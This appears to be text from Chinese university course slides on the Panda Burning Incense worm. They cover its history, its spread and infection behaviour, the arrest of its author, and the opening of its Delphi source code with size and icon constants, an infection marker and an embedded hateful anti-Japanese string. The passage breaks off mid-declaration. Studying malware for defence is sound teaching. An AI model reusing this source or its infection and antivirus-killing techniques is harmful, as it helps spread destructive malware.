文档介绍：教学单元4-4 蠕虫病毒防治
熊猫烧香病毒源码分析
熊猫烧香病毒特点
熊猫烧香病毒行为分析
第二讲 熊猫烧香蠕虫病毒剖析
计算机病毒与防治课程小组
熊猫烧香病毒的手工清除
熊猫烧香病毒剖析
2021/1/15
1
熊猫烧香病毒特点
计算机病毒与防治课程小组
病毒名称 熊猫烧香
又称 尼姆亚、武汉男生、.、.
病毒类型 蠕虫病毒
危险级别 ★★★★★
影响系统 Win 9X/ME/NT/2000/XP/2003
熊猫烧香病毒剖析
2021/1/15
2
熊猫烧香病毒特点
计算机病毒与防治课程小组
2006年底，我国互联网上大规模爆发“熊猫烧香”病毒及其变种，该病毒通过多种方式进行传播，同时该病毒还具有盗取用户游戏账号、ＱＱ账号等功能。该病毒传播速度快，危害范围广，截至案发为止，已有上百万个人用户、网吧及企业局域网用户遭受感染和破坏，引起社会各界高度关注。
《瑞星2006安全报告》将其列为十大病毒之首，在《2006年度中国大陆地区电脑病毒疫情和互联网安全报告》的十大病毒排行中一举成为“毒王”。
熊猫烧香病毒剖析
2021/1/15
3
熊猫烧香病毒特点
计算机病毒与防治课程小组
熊猫烧香一个感染型的蠕虫病毒，它能感染系统中exe，com，pif，src，html，asp等文件，它还能中止大量的反病毒软件进程并且会删除扩展名为gho的文件，该文件是一系统备份工具GHOST的备份文件，使用户的系统备份文件丢失。
。
熊猫烧香病毒剖析
2021/1/15
4
熊猫烧香病毒特点
计算机病毒与防治课程小组
湖北省公安厅2007年2月12日宣布，根据统一部署，湖北省网监在多个省市公安机关的配合下，一举侦破了制作传播“熊猫烧香”病毒案，抓获李俊（男，２５岁，武汉新洲区人）。
病毒制造者
熊猫烧香病毒剖析
2021/1/15
5
熊猫烧香病毒源码分析
计算机病毒与防治课程小组
含有病毒体的文件被运行后，病毒将自身拷贝至系统目录，同时修改注册表将自身设置为开机启动项，并遍历各个驱动器，将自身写入磁盘根目录下，，使得用户打开该盘时激活病毒体。随后病毒体开一个线程进行本地文件感染，同时开另外一个线程连接网站下载ddos程序进行发动恶意攻击。
病毒结构
主程序流程图
熊猫烧香病毒剖析
2021/1/15
6
熊猫烧香病毒源码分析
计算机病毒与防治课程小组
Program  japussy;
uses
windows, sysutils, classes, graphics, shellapi{, registry};
const
headersize = 82432;             //病毒体的大小
iconoffset = $12eb8;           //pe文件主图标的偏移量
//查找2800000020的十六进制字符串可以找到主图标的偏移量
{
headersize = 38912;             //upx压缩过病毒体的大小
iconoffset = $92bc;             //upx压缩过pe文件主图标的偏移量
}
iconsize   = $2e8;             //pe文件主图标的大小--744字节
icontail   = iconoffset + iconsize; //pe文件主图标的尾部
id       = $44444444;         //感染标记
病毒文件初始信息
熊猫烧香病毒剖析
2021/1/15
7
熊猫烧香病毒源码分析
计算机病毒与防治课程小组
//垃圾码，以备写入
catchword = 'if a race need to be killed out, it must be yamato. ' +
 'if a country need to be destroyed, it must be japan! ' +
 '***  ***';
{$r *.res}
function registerserviceprocess(dwprocessid, dwtype: integer): integer; 
stdcall; external '';  //函数声明
var
tmpfile: string;
si:     startupinfo;
pi:     process_inform